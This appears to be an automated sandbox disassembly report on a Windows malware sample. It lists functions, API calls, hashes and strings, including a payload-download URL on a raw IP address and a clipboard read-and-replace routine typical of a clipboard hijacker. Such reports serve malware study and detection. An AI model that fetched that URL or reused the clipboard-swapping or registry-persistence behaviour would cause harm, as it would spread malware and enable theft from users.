Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 02530E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02530223,?,?), ref: 02530E19
SetErrorMode.KERNEL32(00000000,?,?,02530223,?,?), ref: 02530E1E

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 690c7f7f7e818847bcba412f42ffdaaae1a26ba2e906be7a4eeda5aa322d6f58
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 2FD0123124522877D7013A94DC09BCD7F5CDF05B66F008011FB0DD9080C770954046E9

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 00B4B0ED Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00B4B13E

Memory Dump Source

Source File: 00000000.00000002.4130558375.0000000000B4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b4a000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 021429888b5003d1ead9eba1e3e1cd0b276ab9dec7766aa9bb908c00649c88ee
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 4C112D79A00208EFDB01DF98C985E99BBF5EF08350F058094FA489B362D371EA50EB80

Non-executed Functions

Function 02531942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0253194D
Sleep.KERNEL32(00001541), ref: 02531957

Part of subcall function 0253CE77: _strlen.LIBCMT ref: 0253CE8E

OpenClipboard.USER32(00000000), ref: 02531984
GetClipboardData.USER32(00000001), ref: 02531994
_strlen.LIBCMT ref: 025319B0
_strlen.LIBCMT ref: 025319DF
_strlen.LIBCMT ref: 02531B23
EmptyClipboard.USER32 ref: 02531B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 02531B46
GlobalUnlock.KERNEL32(00000000), ref: 02531B70
SetClipboardData.USER32(00000001,00000000), ref: 02531B79
GlobalFree.KERNEL32(00000000), ref: 02531B80
CloseClipboard.USER32 ref: 02531BA4
Sleep.KERNEL32(000002D2), ref: 02531BAF

Strings

i, xrefs: 025319C0
4#E, xrefs: 0253195D

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: 0167bb736f7c0b2d90b5253d9b39445f13a8a56868ad5989bc91f4cba9a585e1
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: 69510230C00B959AE3129FB4EC55BEC7B74FF5A307F04A225D805A6162EB709A81CB6D

Function 02532361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0253239C
GetClientRect.USER32(?,?), ref: 025323B1
GetDC.USER32(?), ref: 025323B8
CreateSolidBrush.GDI32(00646464), ref: 025323CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 025323EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0253240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 02532416
MulDiv.KERNEL32(00000008,00000000), ref: 0253241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02532443
SetBkMode.GDI32(?,00000001), ref: 025324CE
_wcslen.LIBCMT ref: 025324E6

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: 55f4dd17e99eb01885c164676bf996649a07a479244a62a3f8ed7e091be62bb7
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: 2871FD72900228AFDB229F64DD85FAEB7BCFB09711F0042A5F509E6151DA70AF80CF24

Function 0256B9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0256BCF4,?,00000000), ref: 0256BA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0256BCF4,?,00000000), ref: 0256BA97
GetACP.KERNEL32(?,?,0256BCF4,?,00000000), ref: 0256BAAC

Strings

OCP, xrefs: 0256BA29
ACP, xrefs: 0256B9F3

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 32b0bc8256fa2d3e3a3324aab3a3cafc882d623cc6c2b7e342211aa67817a00d
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 7E21B672A00105AAEB348F54D909BB77BA6FB40E1CB468465E90AF7204F733DE40C398

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

ACP, xrefs: 0043B78C
OCP, xrefs: 0043B7C2

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 0256BBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02562141: GetLastError.KERNEL32(?,?,0255A9EC,?,00000000,?,0255CDE6,0253247E,00000000,?,00451F20), ref: 02562145
Part of subcall function 02562141: _free.LIBCMT ref: 02562178
Part of subcall function 02562141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621B9

Part of subcall function 02562141: _free.LIBCMT ref: 025621A0
Part of subcall function 02562141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0256BCB5
IsValidCodePage.KERNEL32(00000000), ref: 0256BD10
IsValidLocale.KERNEL32(?,00000001), ref: 0256BD1F
GetLocaleInfoW.KERNEL32(?,00001001,02560A1C,00000040,?,02560B3C,00000055,00000000,?,?,00000055,00000000), ref: 0256BD67
GetLocaleInfoW.KERNEL32(?,00001002,02560A9C,00000040), ref: 0256BD86

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: 7ebfbf897a88986d41dbe12d6895d02be3f34afd524430f1d6d61dda85f56f68
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: 8351847190020B9FEB10DFA5DC48ABE7BBAFF54708F140529E904F7290EB719A05CB69

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
